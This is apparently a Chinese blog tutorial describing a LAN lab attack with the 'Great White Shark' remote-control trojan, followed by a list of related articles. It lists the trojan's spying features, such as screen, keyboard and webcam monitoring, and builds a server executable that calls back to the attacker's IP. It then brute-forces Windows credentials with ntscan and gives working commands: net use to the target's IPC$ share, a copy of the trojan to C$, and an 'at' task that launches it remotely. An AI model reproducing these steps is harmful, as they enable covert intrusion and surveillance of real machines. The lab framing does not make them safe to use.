使用大白鲨进行木马攻击实验并实现爆破目标机账号密码以远程连接
实验环境建议在虚拟机上运行
科学无罪,所有实验环境都在局域网内进行
实验条件
- 两个Windows虚拟机
- 一个安装大白鲨远程控制软件
- 两个虚拟机开启ftp服务(用于木马文件之间的传输)
大白鲨远程控制软件是一个比较旧的攻击软件
大白鲨远程控制 2010 Bate1(v1.6)
运行平台:Win2K、WinXP、Win03、WinVista、Win07、Win2008
软件简介:
兼容1.4~1.3版本
单一exe,不带DLL文件(无可没配置前114KB,压缩52KB)!
注入进程兼容win7/win8/vista
功能简介:
1.屏幕监控,可以查看对方屏幕以及鼠标监控、键盘监控、强制关闭显示器等。
2.视频监控、可以查看对方视频,含有MSH263,IndeoVideo5.04,IntelIndeo®VideoR3.2编码
3.CMD命令:模拟CMD。也就是telnet命令执行
4.文件管理:磁盘空间查看、文件浏览、WinRAR压缩解压(必须有安装WINRAR)、执行文件(以后缀执行/Exe类型执行)、上传、下载、删除、新建(文件/文件夹)…
5.进程管理:进程信息查看。包括进程创建时间,父进程ID等…,可以结束进程。
6.服务管理:服务信息查看。包括服务的PID、启动时间、模块路径、描述。等查看,可以对服务进行基本操作.
7.注册表管理:类似于注册表模拟器,可以删除指定注册表值,键,以及新建等…
8.窗口管理:可以设置窗口标题、对窗口的其他操作,比如关闭窗口(包括父窗口)或隐藏窗口等…
9.附加功能:分为“信息查看”与“插件管理”。
<1>信息查看:可以看对方系统信息,服务端配置信息,宽带信息需要上传指定插件才能查看!
<2>插件管理”能上传插件并启用对应的功能!“比如HTTP代理”。
10.其他管理:有点类似与恶作剧,有禁止鼠标活动与键盘活动功能==,还有查看剪切板字符串==等功能。
11.批量操作:分为“筛选主机”、“修改配置”、“发送信息”、“其它操作”4个面板!
<1>筛选主机:可以筛选你先要进行批量操作的主机,如内存大于512MB,小于2048MB的主机
<2>修改配置:可以修改上线信息,如IP、端口或者备注!
<3>发送信息:分为发生“窗口信息”和“屏幕字体”两种信息。
<4>其它操作:可以下载URL文件,隐藏打开网页、重启、关机、开启3389端口、更新被控端功能
开始实验
将Windows7 IP地址配置成 10.1.1.3,winserver2003 IP地址配置成10.1.1.1
打开大白鲨远控exe
先设置好一个端口,以免端口冲突
配置程序
IP设置成我们服务端IP,即hacker的IP地址,点击确定
将生成的MyServer.exe文件保存在桌面,这个就是木马文件
本机测试一下
先在本地测试一下,单机木马文件运行
听见“有主机上线请注意”,即连接成功。
发送到目标主机进行控制
建议使用ftp文件发送,避免经过物理机。
打开(或者搭建)ftp服务
运行
已有主机上线,成功
远程登录主机进行文件传输
使用工具ntscan ,爆破破解局域网内的主机用户名及密码
可以及时更新字典,因为知道密码,所以我就直接把密码加到字典里做个样子。
爆破成功
知道主机账户名和密码后,远程登录主机,直接开搞。
Windows下有个叫任务计划的东西,我们可以使用命令行控制
回到hacker,输入命令
net use \\10.1.1.1\ipc$ * /user:Administrator
net use是远程登录的意思,* 代表待会输入密码,这样密码就不是明文显示在命令行,更加安全
远程登录之后,使用命令:
copy Myserver.exe \\10.1.1.1\c$
去那边查看一下,发现传输成功
我们新建计划任务,先看看对方的时间,对方的时间可能跟我们的不一样,所以这一步不能省。
创建任务,并查看计划任务
at \\10.1.1.1 15:32 \\10.1.1.1\c$\Myserver.exe
at \\10.1.1.1
返回大白鲨验证
成功连接
控制目标机
尝试远程屏幕监控(成功)
成功
路漫漫其修远兮,还没入门
使用大白鲨进行木马攻击实验并实现爆破目标机账号密码以远程连接相关推荐
- 网络攻防实验之木马攻击实验
这个实验是网络攻防课程实验中的一个,以冰河木马为例,操作系统是XP,对于现在的安全意义不大了,但是可以看一下多年前流行的冰河木马的功能和操作. 一.实验目的和要求 (1)通过对木马的练习,使读者理解和 ...
- 使用大batch优化深度学习:训练BERT仅需76分钟 | ICLR 2020
作者 | Yang You, Jing Li等 译者 | 刘畅 在海量数据集上训练大型深度神经网络,是非常具有挑战性的.最近,有许多研究均使用大batch随机优化方法来解决此问题.在该研究领域中,目前 ...
- 实验三 ShellShock 攻击实验
ShellShock 攻击实验 沙雨济 一. 实验描述 2014年9月24日,Bash中发现了一个严重漏洞shellshock,该漏洞可用于许多系统,并且既可以远程也可以在本地触发.在本实验中,学生需 ...
- CSAPP lab3 bufbomb-缓冲区溢出攻击实验(下)bang boom kaboom
CSAPP lab3 bufbomb-缓冲区溢出攻击实验(上)smoke fizz CSAPP lab3 bufbomb-缓冲区溢出攻击实验(下)bang boom kaboom 栈结构镇楼 这里先给 ...
- 《Linux内核原理与设计》第十一周作业 ShellShock攻击实验
<Linux内核原理与设计>第十一周作业 ShellShock攻击实验 分组: 和20179215袁琳完成实验及博客攥写 实验内容: Bash中发现了一个严重漏洞shellshock, ...
- 使用大数据分析需要注意什么因素
现在是大数据时代,大数据无处不在,世界上大多数组织都在使用.虽然完全同化还存在一些障碍,但这些障碍主要与"如何"而不是"为什么"有关.长期以来,人们一直认为企业 ...
- 计算机系统基础学习笔记(7)-缓冲区溢出攻击实验
缓冲区溢出攻击实验 实验介绍 实验任务 实验数据 目标程序 bufbomb 说明 bufbomb 程序接受下列命令行参数 目标程序bufbomb中函数之间的调用关系 缓冲区溢出理解 目标程序调用的ge ...
- 从入门到入土:IP源地址欺骗dos攻击实验
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益.不合适引用,自当删除! 若 ...
- 脚本及恶意网页攻击实验
脚本及恶意网页攻击实验 实验条件 实验过程 步骤一 步骤二 步骤三 步骤四 步骤五 步骤六 实验条件 本实验可在 Windows XP及以上版本操作系统的计算机上进行,该计算机既可以是一台物理机,也可 ...
- 【网络攻防技术】实验四——缓冲区溢出攻击实验
文章目录 一.实验题目 二.实验步骤 Task1: Get Familiar with the Shellcod Task2: Level-1 Attack Task 3: Level-2 Attac ...
最新文章
- golang bufio.newscanner如何超时跳出_Golang微服务的熔断与限流
- Linux日志系统-03:logrotate主配置文件详解
- am4针脚定义_AMD Zen处理器/AM4接口针脚数大增,比英特尔还多-控制器/处理器-与非网...
- qhfl-9 微信模板消息推送
- TimingWheel 时间轮详解
- html框架有什么作用,使用HTML5+CSS+JS框架有那些好处
- 不同的电脑打印预览不同怎么解决_条码打印软件中标签预览正常打印无反应怎么解决...
- 小顶堆数据结构C/C++代码实现
- 【转】HBase原理和设计
- pintos project (2) Project 1 Thread -Mission 1 Code
- 【论文总结】TextGCN
- Camtasia Recorder 2020如何确定录制区域
- Android 动态申请多个权限 (第三方插件版:EasyPermissions)
- python 插入数据库 b“Incorrect syntax near ‘,‘.DB-Lib error message 20018
- Java的强、软、弱、虚四种引用类型
- C语言中进制转换与函数
- HTML网页设计作业
- MessageDigest 详解
- 使用shell命令文件和lame工具在mac平台批量压缩mp3,可压缩至原来的50%左右。
- leetcode刷题_day14_(str,hashmap)_code3(最长非重子串)
热门文章
- pktgen-dpdk 进行rfc2544测试
- 单网口RFC2544测试——信而泰网络测试仪实操
- ym——Android从零开始(27)(山寨版微信-下)(新)
- PTC Creo 8.0.0.0 x64 Multilingual
- CR渲染器全景图如何渲染颜色通道_3dmax云渲染是什么?渲染100使用步骤
- 小米案例分析PPT模板
- SENTAURUS_2018_06
- IDEA This is not a valid Java qualified name问题解决
- 神兵利器Dagger2一站式全解(详细总结)
- c语言中关系运算符和逻辑运算符,c语言中的关系运算符和逻辑运算符